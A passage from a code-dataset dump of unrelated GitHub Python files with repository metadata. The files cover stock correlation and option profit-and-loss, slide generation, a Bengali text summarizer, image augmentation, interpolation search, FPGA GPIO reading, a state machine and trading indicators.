return: data frame with adjusted close of all SP500 companies\n store: sp500_joined_closes.csv\n \"\"\"\n\n with open(\"sp500tickers.pickle\",\"rb\") as f:\n tickers = pickle.load(f)\n\n main_df = pd.DataFrame()\n\n for count,ticker in enumerate(tickers[:5]): #just do 5 for now\n df = pd.read_csv('stock_dfs/{}.csv'.format(ticker))\n df.set_index('Date', inplace=True)\n df.rename(columns={'Adj Close':ticker}, inplace=True)\n df.drop(['Open','High','Low','Close','Volume'],1,inplace=True)\n if main_df.empty:\n main_df = df\n else:\n main_df = main_df.join(df, how='outer')\n\n main_df.to_csv('sp500_joined_closes.csv')\n return main_df\n\ndef visualize_data():\n \"\"\"\n Calculate the correlation of every ticker to every other ticker in the master data frame and then\n display as a heatmap\n return: data frame with the correlations\n \"\"\"\n df = pd.read_csv('sp500_joined_closes.csv')\n df_corr = df.corr()\n df_corr.to_csv('sp500corr.csv')\n\n data1 = df_corr.values\n fig1 = plt.figure()\n ax1 = fig1.add_subplot(111)\n heatmap1 = ax1.pcolor(data1, cmap=plt.cm.RdYlGn)\n fig1.colorbar(heatmap1)\n ax1.set_xticks(np.arange(data1.shape[1]) + 0.5, minor=False)\n ax1.set_yticks(np.arange(data1.shape[0]) + 0.5, minor=False)\n ax1.invert_yaxis()\n ax1.xaxis.tick_top()\n column_labels = df_corr.columns\n row_labels = df_corr.index\n ax1.set_xticklabels(column_labels)\n ax1.set_yticklabels(row_labels)\n plt.xticks(rotation=90)\n heatmap1.set_clim(-1.0, 1.0)\n plt.tight_layout()\n # plt.savefig(\"correlations.png\", dpi = (300))\n plt.show()\n\n return df_corr\n\n\ndef process_data_for_labels(ticker):\n \"\"\"\n\n :param ticker:\n :return:\n \"\"\"\n hm_days = 7\n df = pd.read_csv('sp500_joined_closes.csv', index_col=0)\n tickers = df.columns.values.tolist()\n df.fillna(0, inplace=True)\n\n for i in range(1, hm_days + 1):\n df['{}_{}d'.format(ticker, i)] = (df[ticker].shift(-i) - df[ticker]) / df[ticker]\n\n df.fillna(0, inplace=True)\n return tickers, df\n\ndef buy_sell_hold(*args):\n \"\"\"\n\n :param args:\n :return:\n \"\"\"\n cols = [c for c in args]\n requirement = 0.02\n for col in cols:\n if col > requirement:\n return 1\n if col < -requirement:\n return -1\n return 0\n\ndef extract_featuresets(ticker):\n \"\"\"\n\n :param ticker:\n :return:\n \"\"\"\n tickers, df = process_data_for_labels(ticker)\n\n df['{}_target'.format(ticker)] = list(map( buy_sell_hold,\n df['{}_1d'.format(ticker)],\n df['{}_2d'.format(ticker)],\n df['{}_3d'.format(ticker)],\n df['{}_4d'.format(ticker)],\n df['{}_5d'.format(ticker)],\n df['{}_6d'.format(ticker)],\n df['{}_7d'.format(ticker)] ))\n\n vals = df['{}_target'.format(ticker)].values.tolist()\n str_vals = [str(i) for i in vals]\n print('Data spread:', Counter(str_vals))\n\n df.fillna(0, inplace=True)\n df = df.replace([np.inf, -np.inf], np.nan)\n df.dropna(inplace=True)\n\n df_vals = df[[ticker for ticker in tickers]].pct_change()\n df_vals = df_vals.replace([np.inf, -np.inf], 0)\n df_vals.fillna(0, inplace=True)\n\n X = df_vals.values\n y = df['{}_target'.format(ticker)].values\n\n return X, y, df\n\n#******************************************************************************\n#****************************** Classes ***************************************\n#******************************************************************************\n\n\nclass callOption():\n \"\"\"\n Encapsulation of a call options properties and methods.\n Things to do:\n add Greeks\n add Pricing Model\n add web data retrieval\n ???\n \"\"\"\n\n def __init__(self, price, fee, strike, quantity, buy, covered = False):\n self.price = price\n self.fee = fee\n self.strike = strike\n self.quantity = quantity\n self.buy = buy\n self.covered = covered\n if buy:\n self.initial = -(quantity * 100 * price) - fee\n else:\n self.initial = (quantity * 100 * price) - fee\n\n def findPL(self, currentPrice):\n result = self.initial\n breakEven = 0\n if self.buy:\n if currentPrice >= (self.strike + 0.01):\n result = self.initial + 100 * self.quantity * (currentPrice - self.strike)\n else: #sell\n if currentPrice >= (self.strike + 0.01):\n result = self.initial - 100 * self.quantity * (currentPrice - self.strike)\n return result\n\n def inMoney(self, currentPrice):\n result = 0\n if currentPrice >= (self.strike + 0.01):\n result = 1\n\n return result\n\n\nclass putOption():\n \"\"\"\n Encapsulation of a put options properties and methods.\n Things to do:\n add Greeks\n add Pricing Model\n add web data retrieval\n ???\n \"\"\"\n def __init__(self, price, fee, strike, quantity, buy, covered = False):\n self.price = price\n self.fee = fee\n self.strike = strike\n self.quantity = quantity\n self.buy = buy\n self.covered = covered\n if buy:\n self.initial = -(quantity * 100 * price) - fee\n else:\n self.initial = (quantity * 100 * price) - fee\n\n def findPL(self, currentPrice):\n result = self.initial\n breakEven = 0\n if self.buy:\n if currentPrice <= (self.strike - 0.01):\n result = self.initial + 100 * self.quantity * (self.strike - currentPrice)\n else: #sell\n if currentPrice <= (self.strike - 0.01):\n result = self.initial - 100 * self.quantity * (self.strike - currentPrice)\n return result\n\n def inMoney(self, currentPrice):\n result = 0\n if currentPrice <= (self.strike - 0.01):\n result = 1\n\n return result\n\n#******************************************************************************\n#****************************** Sandbox ***************************************\n#******************************************************************************\n\n\nbuildSimulateChain()\n\n\n\n# callQuotes, putQuotes = getOptionData()\n#\n# print(callQuotes)\n# print(putQuotes)\nstyle.use('ggplot')\nstart = dt.datetime(2016, 1, 2)\nstop = dt.datetime(2017, 3, 27)\n\n#mySP500 = save_sp500tickers()\n#print(mySP500)\n\n#get_data_from_yahoo(\"2016-1-2\", \"2017-3-27\")\n#df = compile_data()\n#df = visualize_data()\n#tickers, df = process_data_for_labels(\"ABBV\")\n#_, _, df = extract_featuresets(\"ABBV\")\n#print(df.head())\n\ntry:\n# df = altGetMeData(\"GE\", start, stop)\n df = web.DataReader(\"GE\", \"yahoo\", start, stop)\nexcept:\n df = getMeData(\"GE\", \"2016-1-2\", \"2017-3-27\")\ndf.to_csv(\"GE.csv\")\ndf = pd.read_csv(\"GE.csv\", parse_dates = True, index_col = 0)\n\n_, newDF = getMeStats(df)\n#plt.xticks(rotation=70)\n# plt.plot(newDF.index, newDF[\"Close\"], newDF.index, newDF[\"Change\"], newDF.index, newDF[\"50D_MA\"])\n# _, myLabels = plt.xticks()\n# for label in myLabels:\n# label.set_rotation(45)\n# plt.tight_layout()\n#df.plot(subplots = True, sharex = True)\n\n#plt.show()\n\nfig, (ax1, ax2) = plt.subplots(2, 1, sharex = True)\nax1.plot(newDF.index, newDF[\"Close\"], newDF.index, newDF[\"50D_MA\"])\nax2.plot(newDF[\"Change\"])\n_, myLabels = plt.xticks()\nfor label in myLabels:\n label.set_rotation(45)\n\nplt.tight_layout()\nplt.show()\n\n\n#print(df.head())\n\nmoreData = fetchGF(\"GE\")","repo_name":"jmars3k/finTechOptions","sub_path":"optionHeuristics.py","file_name":"optionHeuristics.py","file_ext":"py","file_size_in_byte":25870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"12103291701","text":"import pptx\nfrom pptx.util import Inches\nfrom pptx import Presentation\nimport glob\nimport os\n\n#reference url: https://qiita.com/aykbzl/items/09b52fabb3af6b925fb9\n\nppt = Presentation()\nwidth = ppt.slide_width\nheight = ppt.slide_height\n\n#使用するスライドの種類\ntitle_slide_layout = ppt.slide_layouts[0] #Title Slideの作成\nbullet_slide_layout = ppt.slide_layouts[1] #Title and Contentの作成\nblank_slide_layout = ppt.slide_layouts[6] #Blankの作成\n\n#Title Slide\nslide = ppt.slides.add_slide(title_slide_layout)\ntitle = slide.shapes.title\nsubtitle = slide.placeholders[1]\n\n#title_text = input(\"Title: \")\n#subtitle_text = input(\"Subtitle: \")\n\ntitle_text = \"\"\nsubtitle_text = \"\"\n\n\ntitle.text = title_text\nsubtitle.text = subtitle_text\n\n#get images\nfnms = glob.glob('*.png')\n#print(fnms)\ntx_left = tx_top = tx_width = tx_height = Inches(1)\ni = 1\nfor fnm in fnms:\n #insert images\n slide_picture = ppt.slides.add_slide(blank_slide_layout)\n pic = slide_picture.shapes.add_picture(fnm, width, height, width, height)\n pic.left = int((width -pic.width)/2)\n pic.top = int((width -pic.height)/2)\n #insert a textbox\n txBox = slide_picture.shapes.add_textbox(tx_left, tx_top/2, tx_width, tx_height)\n tB = txBox.text_frame\n tB.text = \"No. \" + str(i)\n i += 1\nppt.save('figure_zircon.pptx')\nos.system(\"open figure_zircon.pptx\")\n","repo_name":"sotaniki/u_th_pb_dating","sub_path":"figure_output.py","file_name":"figure_output.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"21980810399","text":"from json import loads, dumps\nfrom SerialComs import serial_ports\n\ndef portsCom() -> str:\n \"\"\"Select a serial port to communicate with an arduino\n\n Returns:\n str: the serial port selected\n \"\"\"\n\n ports = serial_ports()\n\n p = \"\"\n for i in range(len(ports)):\n p += \"%d - \" % (i+1) + ports[i] + \"\\n\"\n\n\n #select the serial port\n i = 0\n while i - 1 not in range(len(ports)):\n i = int(input(\"Choose a serial port:\\n%s\\n\\n>>>\" % (p)))\n\n # error message\n if i - 1 not in range(len(ports)):\n print(\"Invalid option!\")\n \n create_configs(ports[i-1])\n\n return ports[i-1]\n\ndef load_configs():\n \"\"\"Tries to read a config file to look for a serial port.\\n\n If it doesn't exist, a new one is created\n\n Returns:\n str: the serial port\n \"\"\"\n # try to read the configs file\n try:\n with open(\"settings.json\", \"r\") as f:\n config = loads(f.read())\n port = config[\"port\"]\n\n # create a new file if it doesn't exist\n except:\n print(\"No configuration detected.\")\n port = portsCom()\n\n return port\n\n\ndef create_configs(port: str):\n \"\"\"Creates a settings file with the selected port\n\n Args:\n port (str): the selected port\n \"\"\"\n\n #create the config file with the selected port\n try:\n with open(\"settings.json\", \"w\") as f:\n f.write(dumps({\"port\":port}, indent=4))\n\n except:\n print(\"ERROR: Impossible to create configuration file!\")\n return port\n\n print(\"Created a configuration file: settings.json\")","repo_name":"ricardo-quintela/SimRacingSetup","sub_path":"hanbrake_revLights/src/ConfigFiles.py","file_name":"ConfigFiles.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"8756953280","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Aug 19 08:18:31 2020\r\n\r\n@author: anant\r\n\"\"\"\r\n\r\nimport nltk\r\nimport os\r\nimport re\r\nimport math\r\nimport operator\r\nfrom banglakit import lemmatizer as lem\r\nfrom banglakit.lemmatizer import BengaliLemmatizer\r\nfrom banglakit.lemmatizer.consts import *\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\nfrom PyRouge.pyrouge import Rouge\r\n\r\n\r\n\r\nStopwords = set(stopwords.words(\"stopwords-bn\"))\r\nlemmatizer = BengaliLemmatizer()\r\n\r\n\r\ndef sentence_tokenize(text):\r\n sentences = re.compile('[।!?] ').split(text)\r\n sentences\r\n return sentences\r\n\r\n\r\ndef lemmatize_words(words): \r\n lemmatized_words = []\r\n for word in words:\r\n p = re.sub(r'\\d+', '', lemmatizer.lemmatize(word, pos='verb'))\r\n p = lemmatizer.lemmatize(p, pos='noun')\r\n lemmatized_words.append(p)\r\n return lemmatized_words\r\n\r\n\r\ndef freq(words):\r\n words = [word for word in words]\r\n dict_freq = {}\r\n words_unique = []\r\n for word in words:\r\n if word not in words_unique:\r\n words_unique.append(word)\r\n for word in words_unique:\r\n dict_freq[word] = words.count(word)\r\n return dict_freq\r\n\r\ndef tf_score(word,sentence):\r\n freq_sum = 0\r\n word_frequency_in_sentence = 0\r\n len_sentence = len(sentence)\r\n for word_in_sentence in sentence.split():\r\n if word == word_in_sentence:\r\n word_frequency_in_sentence = word_frequency_in_sentence + 1\r\n tf = word_frequency_in_sentence/ len_sentence\r\n return tf\r\n\r\ndef idf_score(no_of_sentences,word,sentences):\r\n no_of_sentence_containing_word = 0\r\n for sentence in sentences:\r\n sentence = re.sub(r'\\d+', '', sentence)\r\n sentence = sentence.split()\r\n sentence = [word for word in sentence if word not in Stopwords and len(word)>1]\r\n sentence = [word for word in sentence]\r\n sentence = [lemmatize_words(word) for word in sentence]\r\n \r\n if word in sentence:\r\n no_of_sentence_containing_word = no_of_sentence_containing_word + 1\r\n idf = math.log10(no_of_sentences/no_of_sentence_containing_word)\r\n return idf\r\n\r\ndef tf_idf_score(tf,idf):\r\n return tf*idf\r\n\r\ndef word_tfidf(dict_freq,word,sentences,sentence):\r\n word_tfidf = []\r\n tf = tf_score(word,sentence)\r\n idf = idf_score(len(sentences),word,sentences)\r\n tf_idf = tf_idf_score(tf,idf)\r\n return tf_idf\r\n\r\ndef sentence_importance(sentence,dict_freq,sentences):\r\n sentence_score = 0\r\n sentence = re.sub(r'\\d+', '', sentence)\r\n no_of_sentences = len(sentences)\r\n for word in sentence:\r\n if word not in Stopwords and word not in Stopwords and len(word)>1: \r\n word = lemmatize_words(word)\r\n sentence_score = sentence_score + word_tfidf(dict_freq,word,sentences,sentence)\r\n return sentence_score\r\n############\r\n'''pos tag er kaj lemmatization korar shomoy ek shathei kore felsi.\r\n ekta file e pos gula tag kora chilo. ekhon iteration chalanor shomoy je word ta\r\n mile geche shetar root word shei pos onushare kore dilei hobe.\r\n jemon kono ekta word er pos noun holo tokhon noun er root word ber korar niom/rule onushare \r\n root word ber korbo. noun, verb, prottek er jonno alada rule er file ache.Banglakit e.\r\n'''\r\n############\r\nfile = 'G:/EWU/_Current_course/thesis/codes/input.txt'\r\nfile = open(file , 'r',encoding=\"utf8\")\r\ntext = file.read()\r\ntokenized_sentence = sentence_tokenize(text)\r\ntext = re.sub(r'\\d+', '', text)\r\ntokenized_words_with_stopwords = word_tokenize(text)\r\ntokenized_words = [word for word in tokenized_words_with_stopwords if word not in Stopwords]\r\ntokenized_words = [word for word in tokenized_words if len(word) > 1]\r\ntokenized_words = lemmatize_words(tokenized_words)\r\nword_freq = freq(tokenized_words)\r\n\r\ninput_user = int(input('Number of lines to retain:'))\r\nno_of_sentences = input_user\r\n#print(no_of_sentences)\r\n\r\nc = 1\r\nsentence_with_importance = {}\r\nfor sent in tokenized_sentence:\r\n sentenceimp = sentence_importance(sent,word_freq,tokenized_sentence)\r\n sentence_with_importance[c] = sentenceimp\r\n c = c+1\r\n\r\nsentence_with_importance = sorted(sentence_with_importance.items(), key=operator.itemgetter(1),reverse=True)\r\n\r\ncnt = 0\r\nsummary = []\r\nsentence_no = []\r\nfor word_prob in sentence_with_importance:\r\n if cnt < no_of_sentences:\r\n sentence_no.append(word_prob[0])\r\n cnt = cnt+1\r\n else:\r\n break\r\n \r\nsentence_no.sort()\r\ncnt = 1\r\nfor sentence in tokenized_sentence:\r\n if cnt in sentence_no:\r\n summary.append(sentence)\r\n cnt = cnt+1\r\n \r\nsummary = \" \".join(summary)\r\nprint(\"\\n\")\r\nprint(\"Summary:\")\r\nprint(summary)\r\noutF = open('summary.txt',\"w\",encoding=\"utf8\")\r\noutF.write(summary)\r\n\r\n\r\nr = Rouge()\r\n \r\nsystem_generated_summary = summary\r\nmanual_summmary = \"নাসা আগামী এপ্রিলের মধ্যে চারটি প্রস্তাব থেকে দুটি গ্রহ বিজ্ঞান মিশনের অনুমোদনের কথা বিবেচনা করছে। এর মধ্যে একটি হ'ল শুক্রকে নির্ধারণ করার জন্য এটি জীবনকে লালন করে কিনা। সোমবার একটি আন্তর্জাতিক গবেষণা দল বর্ণনা করেছে যে ভেনাসিয়ার মেঘে থাকা সম্ভাব্য জীবাণুগুলির কোনও প্রমাণ রয়েছে। এছাড়াও ফসফাইন রয়েছে যেখানে অক্সিজেনমুক্ত পরিবেশে ব্যাকটিরিয়া থাকতে পারে। এগুলি দৃড় প্রমাণ দেয় যে এখনও পৃথিবী ছাড়িয়ে জীবন রয়েছে। মার্কিন যুক্তরাষ্ট্রের মহাকাশ সংস্থা ফেব্রুয়ারিতে চারটি মিশনকে শর্টলিস্ট করেছিল যা নাসা প্যানেল দ্বারা পর্যালোচনা করা হয় এবং এর মধ্যে দুটি ভেনাসে রোবোটিক প্রোব জড়িত। DAVINCI + নামের একটিকে ভেনুসিয়ান বায়ুমণ্ডলে প্রেরণ করা হবে।\"\r\n\r\n[precision, recall, f_score] = r.rouge_l([system_generated_summary], [manual_summmary])\r\n\r\nprint(\"\\nPrecision is :\"+str(precision)+\"\\nRecall is :\"+str(recall)+\"\\nF Score is :\"+str(f_score))\r\n","repo_name":"ananta6d595/Bangla-text-Summarisation-with-Improved-Method","sub_path":"MainSummariserProgram.py","file_name":"MainSummariserProgram.py","file_ext":"py","file_size_in_byte":6767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"14850497302","text":"import albumentations as A\nimport cv2\n\ntransforms = A.Compose([\n A.CLAHE(clip_limit=4.0, tile_grid_size=(8, 8), p=0.25, always_apply=False),\n A.Rotate(limit=3, border_mode=cv2.BORDER_CONSTANT, p=1.0),\n A.Cutout(num_holes=10, p=0.75),\n A.GridDistortion(distort_limit=0.15, border_mode=cv2.BORDER_CONSTANT, p=0.75),\n A.Blur(blur_limit=3, p=0.5),\n A.JpegCompression(quality_lower=75, p=0.5),\n A.MotionBlur(blur_limit=3, p=0.75)\n])\n","repo_name":"NastyBoget/hrtr","sub_path":"src/dataset/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"96"} +{"seq_id":"32204577686","text":"'''\n보간 검색(Interpolation Search)\n 이진 검색을 보완한 검색 알고리즘\n\n 값의 분포에 따라 중앙값의 위치를 예측하며,\n 예측한 위치에 있는 값이 탐색 대상보다\n 큰지 작은지에 따라 탐색 범위를 좁혀가며 탐색합니다.\n\n 이 알고리즘은 값의 분포가 고르지 않은 경우에는\n 이진 검색보다 성능이 떨어질 수 있습니다.\n\n이진 탐색\npos = (low + high)/2\n\n보간 탐색\n\n배열의 중간값(mid)과 찾으려는 값(value)의 상대적인 위치 비율을 계산합니다.\nposition = (value - min_value) / (max_value - min_value)\n배열의 중간값(mid)을 다음과 같은 공식으로 계산합니다:\nmid = left + int((right - left) * position)\n'''\ndef interpolation_search(arr, target):\n # 탐색 범위의 시작점과 끝점을 지정한다\n left, right = 0, len(arr) - 1\n # 탐색 범위가 존재하는 동안 반복한다\n while left <= right:\n # 값의 분포에 따라 중앙값의 위치를 예측한다\n pos = left + int((float(right - left) / (arr[right] - arr[left])) * (target - arr[left]))\n\n print(\"pos : \",pos)\n print(\"target : \",target)\n\n # 예측한 위치가 배열 범위를 벗어나는 경우, 탐색 대상이 없다고 판단한다\n if pos < 0 or pos >= len(arr):\n return -1\n # 예측한 위치에 탐색 대상이 있는 경우, 인덱스를 반환한다\n if arr[pos] == target:\n return pos\n # 예측한 위치에 탐색 대상보다 큰 값이 있는 경우, 오른쪽 부분 배열을 탐색한다\n elif arr[pos] < target:\n left = pos + 1\n # 예측한 위치에 탐색 대상보다 작은 값이 있는 경우, 왼쪽 부분 배열을 탐색한다\n else:\n right = pos - 1\n # 탐색 대상을 찾지 못한 경우 -1을 반환한다\n return -1\n\n\narr = [1, 3, 5, 7, 9,12,15,17,22,28,99,101,106]\ntarget =22\nresult = interpolation_search(arr, target)\nprint(result) # 2","repo_name":"dobbyfree23/PythonProjectPro","sub_path":"Day13/Search/Ex03-InterpolationSearch.py","file_name":"Ex03-InterpolationSearch.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"13231491254","text":"import corr, time\nimport numpy as np\nimport struct\nimport matplotlib.pyplot as plt\n\nIP = '192.168.1.12'\nbof = 'test_gpio2.bof'\n\nfpga = corr.katcp_wrapper.FpgaClient(IP)\ntime.sleep(3)\nfpga.upload_program_bof(bof, 3000)\n\nfpga.write_int('reset', 1)\nfpga.write_int('reset', 0)\n\"\"\"\nbbox_vals = np.zeros(49)\nfor i in range(0, 49):\n fpga.write_int('index', i)\n bbox_vals[i] = fpga.read_int('bbox_out')\n\"\"\"\n\"\"\"\nopen(data_filename, 'w').close()\nf = file(data_filename, 'a')\nraw_data = fpga.read('data', 2**15, 0)\nf.write(raw_data)\nf.close()\nprint 'listoco'\n\n#parse the gpio readings\n\nreg_bitsize = 128\naddr = 2**11\ndata_filename = 'gpio_data'\nfr = file(data_filename, 'r')\n\nn_lectures = reg_bitsize*addr\nn_lect_in_char = str(n_lectures/8)\nparse_input = struct.unpack('>'+n_lect_in_char+'b', fr.read(n_lectures))\nfr.close()\nplt.plot(parse_input)\nplt.show()\n\"\"\"\ndef read_gpio(n_lectures):\n fpga.write_int('reset', 1)\n fpga.write_int('reset', 0)\n fpga.write_int('enable',1)\n raw_data = fpga.read('data', 2**15, 0)\n n_lect_in_char = str(n_lectures/8)\n parse_input = struct.unpack('>'+n_lect_in_char+'b', raw_data)\n plt.plot(parse_input)\n plt.show()\n fpga.write_int('enable', 0)\n\nreg_bitsize = 128\naddr = 2**11\nn_lectures = reg_bitsize*addr\nread_gpio(n_lectures)\n \n","repo_name":"seba1224/vector_voltmeter","sub_path":"models/test_gpio/gpio_2/gpio_init.py","file_name":"gpio_init.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"43077280662","text":"#!/usr/bin/env python3\n\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\nimport matplotlib.pyplot as plt\nimport skimage\nfrom skimage.transform import resize\n\ndef to_multichannel(i):\n if i.shape[2] == 3: return i\n i = i[:,:,0]\n return np.stack((i,i,i), axis=2)\n\ndef DISPLAY(image_data):\n if len(image_data.shape) < 4: image_data = image_data.reshape((1, image_data.shape[0], image_data.shape[1], 1))\n\n image_viz = display_images(image_data)\n r, g, b = cv2.split(image_viz)\n image_viz = cv2.merge((b, g, r))\n \n width = image_data.shape[2]\n height = image_data.shape[1]\n image_viz = cv2.resize(image_viz, (width, height), interpolation=cv2.INTER_AREA)\n\n if len(image_data.shape) == 4: image_data = image_data.reshape((image_data.shape[1], image_data.shape[2]))\n\n width = image_data.shape[1]\n height = image_data.shape[0]\n image_data = cv2.resize(image_data, (width, height), interpolation=cv2.INTER_AREA)\n\n return image_data, image_viz\n\ndef display_images(outputs, inputs=None, gt=None, is_colormap=True, is_rescale=True):\n plasma = plt.get_cmap('plasma')\n\n shape = (outputs[0].shape[0], outputs[0].shape[1], 3)\n all_images = []\n\n for i in range(outputs.shape[0]):\n imgs = []\n if isinstance(inputs, (list, tuple, np.ndarray)):\n x = to_multichannel(inputs[i])\n x = resize(x, shape, preserve_range=True, mode='reflect', anti_aliasing=True )\n imgs.append(x)\n\n if isinstance(gt, (list, tuple, np.ndarray)):\n x = to_multichannel(gt[i])\n x = resize(x, shape, preserve_range=True, mode='reflect', anti_aliasing=True )\n imgs.append(x)\n\n if is_colormap:\n rescaled = outputs[i][:,:,0]\n if is_rescale:\n rescaled = rescaled - np.min(rescaled)\n rescaled = rescaled / np.max(rescaled)\n imgs.append(plasma(rescaled)[:,:,:3])\n else:\n imgs.append(to_multichannel(outputs[i]))\n\n img_set = np.hstack(imgs)\n all_images.append(img_set)\n\n all_images = np.stack(all_images)\n\n return skimage.util.montage(all_images, multichannel=True, fill=(0,0,0))","repo_name":"YBNML/humantech","sub_path":"scripts/utils_Display.py","file_name":"utils_Display.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"22957979753","text":"# Given an array and a value, remove all the instances of that value in the array.\n# Also return the number of elements left in the array after the operation.\n# It does not matter what is left beyond the expected length.\n#\n# Example:\n# If array A is [4, 1, 1, 2, 1, 3]\n# and value elem is 1,\n# then new length is 3, and A is now [4, 2, 3]\n# Try to do it in less than linear additional space complexity.\n\nclass Solution:\n\n @staticmethod\n def solution(arr, target):\n size = len(arr)\n i = 0\n j = 0\n while i < size:\n if arr[i] == target:\n i += 1\n else:\n arr[j] = arr[i]\n i += 1\n j += 1\n if j < len(arr):\n del arr[j:]\n return j\n\narr = [4, 1, 1, 2, 1, 3]\ntarget = 3\nres = Solution.solution(arr, target)\nprint(arr)\nprint(res)\n\n","repo_name":"Sauvikk/practice_questions","sub_path":"Level3/Two Pointers/Remove Element from Array.py","file_name":"Remove Element from Array.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23867476873","text":"from abc import abstractstaticmethod\nfrom typing import List\n\n\nclass Singleton(type):\n _instances = {}\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\n\nclass FSMError(Exception):\n ...\n\n\nclass InvalidStateTransition(FSMError):\n ...\n\n\nclass BaseState(metaclass=Singleton):\n def __str__(self) -> str:\n return self.__class__.__name__\n\n\nclass BaseFSM:\n \"\"\"\n FSM stores a concrete state recording its current\n state\n \"\"\"\n\n curr_state: BaseState = None\n\n def __init__(self, init_state: BaseState, *args, **kwargs) -> None:\n self.curr_state = init_state\n\n\nclass BaseTransition(metaclass=Singleton):\n \"\"\"\n A Transition checks for the FSM's current state\n and decide whether to perform the transition or not.\n \"\"\"\n\n from_state: List[BaseState] = None\n to_state: BaseState = None\n\n @abstractstaticmethod\n def before_state_change(with_fsm: BaseFSM):\n raise NotImplementedError\n\n @abstractstaticmethod\n def after_state_change(with_fsm: \"BaseFSM\"):\n raise NotImplementedError\n\n def __call__(self, fsm: BaseFSM):\n if fsm.curr_state in self.from_state:\n try:\n # actions before state-change\n self.before_state_change(with_fsm=fsm)\n except Exception as e:\n raise InvalidStateTransition(\n f\"Unable to perform the transition from {fsm.curr_state} to {self.to_state}: {e}\"\n )\n\n if fsm.curr_state in self.from_state:\n # state-change\n fsm.curr_state = self.to_state\n # actions after state-change\n try:\n self.after_state_change(with_fsm=fsm)\n except Exception as e:\n raise InvalidStateTransition(\n f\"Unable to perform the transition from {fsm.curr_state} to {self.to_state}: {e}\"\n )\n else:\n return\n raise InvalidStateTransition(\n f\"Unable to perform the transition from {fsm.curr_state} to {self.to_state}: src state is not in {[str(state) for state in self.from_state]}\"\n )\n","repo_name":"xzpjerry/fsm","sub_path":"fsm/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"14425272800","text":"import pandas as pd\nimport numpy as np\nimport pandas_datareader as pdr\nfrom sklearn import preprocessing\n\ngain = lambda x: x if x > 0 else 0 # works as a map function or in list comprehension\nloss = lambda x: abs(x) if x < 0 else 0 # works as a map function or in list comprehension\n\ndef calc_fourier_transform(sentiment_df):\n close_fft = np.fft.fft(np.asarray(sentiment_df['score'].tolist()))\n fft_df = pd.DataFrame({'fft':close_fft})\n fft_df['absolute'] = fft_df['fft'].apply(lambda x: np.abs(x))\n fft_df['angle'] = fft_df['fft'].apply(lambda x: np.angle(x))\n fft_list = np.asarray(fft_df['fft'].tolist())\n\n for num_ in [5, 10, 15, 20]:\n fft_list_m10= np.copy(fft_list); fft_list_m10[num_:-num_]=0\n sentiment_df['fourier '+str(num_)]=np.fft.ifft(fft_list_m10)\n \n return sentiment_df\n\ndef get_ticker_data(start, end, ticker):\n \"\"\"\n Get historical OHLC data for given date range and ticker.\n Tries to get from Investors Exchange (IEX), but falls back\n to Yahoo! Finance if IEX doesn't have it.\n\n Parameter:\n - ticker: The stock symbol to lookup as a string.\n\n Returns:\n A pandas dataframe with the stock data.\n \"\"\"\n try:\n print('Getting ticker historical data from IEX')\n data = pdr.DataReader(ticker, 'iex', start, end)\n data.index = pd.to_datetime(data.index)\n except:\n print('Getting ticker historical data from Yahoo')\n data = pdr.get_data_yahoo(ticker, start, end)\n return data \n\ndef calc_bollinger_bands(stock, window=14):\n rolling_mean = stock.Close.rolling(window).mean()\n rolling_std = stock.Close.rolling(window).std()\n rolling_mean_s = stock.sentiment.rolling(window).mean()\n rolling_std_s = stock.sentiment.rolling(window).std()\n upper_band = rolling_mean + (rolling_std*2)\n lower_band = rolling_mean - (rolling_std*2)\n upper_band_s = rolling_mean_s + (rolling_std_s*2)\n lower_band_s = rolling_mean_s - (rolling_std_s*2)\n return upper_band, lower_band, upper_band_s, lower_band_s\n\ndef calc_rsi_ewma_sma(close, window_length):\n delta = close.diff()\n delta = delta[1:] \n up, down = delta.copy(), delta.copy()\n up[up < 0] = 0\n down[down > 0] = 0\n roll_up1 = up.ewm(span=window_length).mean()\n roll_down1 = down.abs().ewm(span=window_length).mean()\n RS1 = roll_up1 / roll_down1\n RSI_EWMA = 100.0 - (100.0 / (1.0 + RS1))\n roll_up2 = up.rolling(window_length).mean()\n roll_down2 = down.abs().rolling(window_length).mean() \n RS2 = roll_up2 / roll_down2\n RSI_SMA = 100.0 - (100.0 / (1.0 + RS2))\n return RSI_EWMA, RSI_SMA","repo_name":"MahirOberai/reddit_sentiment_algotrading","sub_path":"feature_calc.py","file_name":"feature_calc.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"8120262509","text":"#todays topic is static variable()(class level variable)\r\n#if the variable isn't vary object to object then this consider as static variable\r\n#this is declare mostly outside of the mthod means directy in the class\r\n#for total class only one copy of static variable will be created and share with all its object.\r\n#we can access static variable either by class name or by object reference.But recommended to use class name\r\n\r\n#places where to declare statoc variables.\r\n#direclty inside the classfrom outside the methods.\r\n#inside the constructor by using class 